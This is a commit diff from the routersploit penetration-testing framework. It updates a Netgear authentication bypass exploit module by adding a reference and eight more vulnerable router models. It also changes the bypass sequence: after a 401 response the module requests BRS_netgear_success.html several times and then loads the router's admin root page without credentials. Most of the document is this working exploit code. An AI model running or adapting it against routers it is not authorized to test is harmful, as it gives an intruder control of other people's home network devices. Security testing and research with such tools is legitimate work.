Skip to content

R
routersploit
Commit 5f8b0094 by Marcin Bury
Options

Fix Neatgear auth bypass exploit.

parent 27658019
Showing with 18 additions and 3 deletions
routersploit/modules/exploits/netgear/n300_auth_bypass.py
......@@ -21,10 +21,19 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt',
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'targets': [
'Netgear N300',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
print "Visit {}/BRS_netgear_success.html\n".format(url)
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
......@@ -51,6 +60,12 @@ class Exploit(exploits.Exploit):
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
for _ in range(0, 3):
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
url = sanitize_url("{}:{}/".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment